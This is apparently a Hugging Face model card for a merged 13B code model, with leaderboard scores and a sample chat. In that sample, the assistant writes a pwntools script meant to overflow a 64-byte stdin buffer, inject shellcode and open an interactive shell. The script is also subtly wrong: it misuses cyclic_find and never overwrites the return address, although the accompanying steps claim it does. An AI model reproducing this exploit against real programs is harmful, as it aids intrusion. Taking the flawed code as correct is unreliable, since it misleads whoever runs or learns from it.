|
--- |
|
license: llama2 |
|
tags: |
|
- moe |
|
- merge |
|
base_model: codellama/CodeLlama-13b-Instruct-hf |
|
model-index: |
|
- name: Winged-Lagomorph-2x13B |
|
results: |
|
- task: |
|
type: text-generation |
|
name: Text Generation |
|
dataset: |
|
name: AI2 Reasoning Challenge (25-Shot) |
|
type: ai2_arc |
|
config: ARC-Challenge |
|
split: test |
|
args: |
|
num_few_shot: 25 |
|
metrics: |
|
- type: acc_norm |
|
value: 47.95 |
|
name: normalized accuracy |
|
source: |
|
url: https://huggingface.co/spaces/HuggingFaceH4/open_llm_leaderboard?query=lodrick-the-lafted/Winged-Lagomorph-2x13B |
|
name: Open LLM Leaderboard |
|
- task: |
|
type: text-generation |
|
name: Text Generation |
|
dataset: |
|
name: HellaSwag (10-Shot) |
|
type: hellaswag |
|
split: validation |
|
args: |
|
num_few_shot: 10 |
|
metrics: |
|
- type: acc_norm |
|
value: 69.39 |
|
name: normalized accuracy |
|
source: |
|
url: https://huggingface.co/spaces/HuggingFaceH4/open_llm_leaderboard?query=lodrick-the-lafted/Winged-Lagomorph-2x13B |
|
name: Open LLM Leaderboard |
|
- task: |
|
type: text-generation |
|
name: Text Generation |
|
dataset: |
|
name: MMLU (5-Shot) |
|
type: cais/mmlu |
|
config: all |
|
split: test |
|
args: |
|
num_few_shot: 5 |
|
metrics: |
|
- type: acc |
|
value: 44.5 |
|
name: accuracy |
|
source: |
|
url: https://huggingface.co/spaces/HuggingFaceH4/open_llm_leaderboard?query=lodrick-the-lafted/Winged-Lagomorph-2x13B |
|
name: Open LLM Leaderboard |
|
- task: |
|
type: text-generation |
|
name: Text Generation |
|
dataset: |
|
name: TruthfulQA (0-shot) |
|
type: truthful_qa |
|
config: multiple_choice |
|
split: validation |
|
args: |
|
num_few_shot: 0 |
|
metrics: |
|
- type: mc2 |
|
value: 44.54 |
|
source: |
|
url: https://huggingface.co/spaces/HuggingFaceH4/open_llm_leaderboard?query=lodrick-the-lafted/Winged-Lagomorph-2x13B |
|
name: Open LLM Leaderboard |
|
- task: |
|
type: text-generation |
|
name: Text Generation |
|
dataset: |
|
name: Winogrande (5-shot) |
|
type: winogrande |
|
config: winogrande_xl |
|
split: validation |
|
args: |
|
num_few_shot: 5 |
|
metrics: |
|
- type: acc |
|
value: 67.4 |
|
name: accuracy |
|
source: |
|
url: https://huggingface.co/spaces/HuggingFaceH4/open_llm_leaderboard?query=lodrick-the-lafted/Winged-Lagomorph-2x13B |
|
name: Open LLM Leaderboard |
|
- task: |
|
type: text-generation |
|
name: Text Generation |
|
dataset: |
|
name: GSM8k (5-shot) |
|
type: gsm8k |
|
config: main |
|
split: test |
|
args: |
|
num_few_shot: 5 |
|
metrics: |
|
- type: acc |
|
value: 25.63 |
|
name: accuracy |
|
source: |
|
url: https://huggingface.co/spaces/HuggingFaceH4/open_llm_leaderboard?query=lodrick-the-lafted/Winged-Lagomorph-2x13B |
|
name: Open LLM Leaderboard |
|
--- |
|
|
|
Grafted WhiteRabbitNeo-13B-v1 and NexusRaven-V2-13B with mergekit. Use the WhiteRabbitNeo template for regular code, and the NR template for function calling. |
|
<img src=https://huggingface.co/lodrick-the-lafted/Winged-Lagomorph-2x13B/resolve/main/winged-lago.png> |
|
|
|
SYSTEM: Answer the Question by exploring multiple reasoning paths as follows: |
|
- First, carefully analyze the question to extract the key information components and break it down into logical sub-questions. This helps set up the framework for reasoning. The goal is to construct an internal search tree. |
|
- For each sub-question, leverage your knowledge to generate 2-3 intermediate thoughts that represent steps towards an answer. The thoughts aim to reframe, provide context, analyze assumptions, or bridge concepts. |
|
- Evaluate the clarity, relevance, logical flow and coverage of concepts for each thought option. Clear and relevant thoughts that connect well with each other will score higher. |
|
- Based on the thought evaluations, deliberate to construct a chain of reasoning that stitches together the strongest thoughts in a natural order. |
|
- If the current chain is determined to not fully answer the question, backtrack and explore alternative paths by substituting different high-scoring thoughts. |
|
- Throughout the reasoning process, aim to provide explanatory details on thought process rather than just state conclusions, including briefly noting why some thoughts were deemed less ideal. |
|
- Once a reasoning chain is constructed that thoroughly answers all sub-questions in a clear, logical manner, synthesize the key insights into a final concise answer. |
|
- Please note that while the focus is on the final answer in the response, it should also include intermediate thoughts inline to illustrate the deliberative reasoning process. |
|
In summary, leverage a Tree of Thoughts approach to actively explore multiple reasoning paths, evaluate thoughts heuristically, and explain the process - with the goal of producing insightful answers. |
|
|
|
USER: Write a pwntools scriptthat overflows a 64 character buffer from stdin. |
|
ASSISTANT: To write a pwntools script that overflows a 64-character buffer from stdin, we need to follow these steps: |
|
|
|
1. **Identify the vulnerable program**: Find the program that has a buffer overflow vulnerability. This can be done by analyzing the program's source code or by using tools like `gdb` or `valgrind`. |
|
2. **Set up the environment**: Install pwntools and any other necessary dependencies. |
|
3. **Create a pwntools script**: Start by importing the `pwn` module and setting up the connection to the vulnerable program. |
|
4. **Find the offset**: Use the `cyclic` function from pwntools to generate a pattern that will help us find the offset. |
|
5. **Overflow the buffer**: Send the generated pattern to the vulnerable program, and then send additional data to overwrite the return address on the stack. |
|
6. **Control the execution flow**: Overwrite the return address with the address of a shellcode or a function that will give us a shell. |
|
7. **Execute the script**: Run the script and observe the results. |
|
|
|
Here's an example pwntools script that overflows a 64-character buffer: |
|
|
|
```python |
|
from pwn import * |
|
|
|
# Set up the connection to the vulnerable program |
|
p = process('./vulnerable_program') |
|
|
|
# Find the offset using cyclic |
|
offset = cyclic_find(b'A'*64) |
|
|
|
# Generate shellcode |
|
shellcode = asm(shellcraft.sh()) |
|
|
|
# Overflow the buffer |
|
payload = b'A' * offset + shellcode |
|
p.sendline(payload) |
|
|
|
# Execute the script |
|
p.interactive() |
|
``` |
|
|
|
In this example, `vulnerable_program` is the name of the vulnerable program, and `shellcraft.sh()` is a function from pwntools that generates shellcode for a Linux/x86-64 system. The `cyclic_find` function is used to find the offset at which the buffer overflow occurs. |
|
|
|
Please note that this script is a basic example and may not work in all cases. It's important to tailor the script to the specific vulnerability and environment you are working with. |
|
# [Open LLM Leaderboard Evaluation Results](https://huggingface.co/spaces/HuggingFaceH4/open_llm_leaderboard) |
|
Detailed results can be found [here](https://huggingface.co/datasets/open-llm-leaderboard/details_lodrick-the-lafted__Winged-Lagomorph-2x13B) |
|
|
|
| Metric |Value| |
|
|---------------------------------|----:| |
|
|Avg. |49.90| |
|
|AI2 Reasoning Challenge (25-Shot)|47.95| |
|
|HellaSwag (10-Shot) |69.39| |
|
|MMLU (5-Shot) |44.50| |
|
|TruthfulQA (0-shot) |44.54| |
|
|Winogrande (5-shot) |67.40| |
|
|GSM8k (5-shot) |25.63| |
|
|
|
|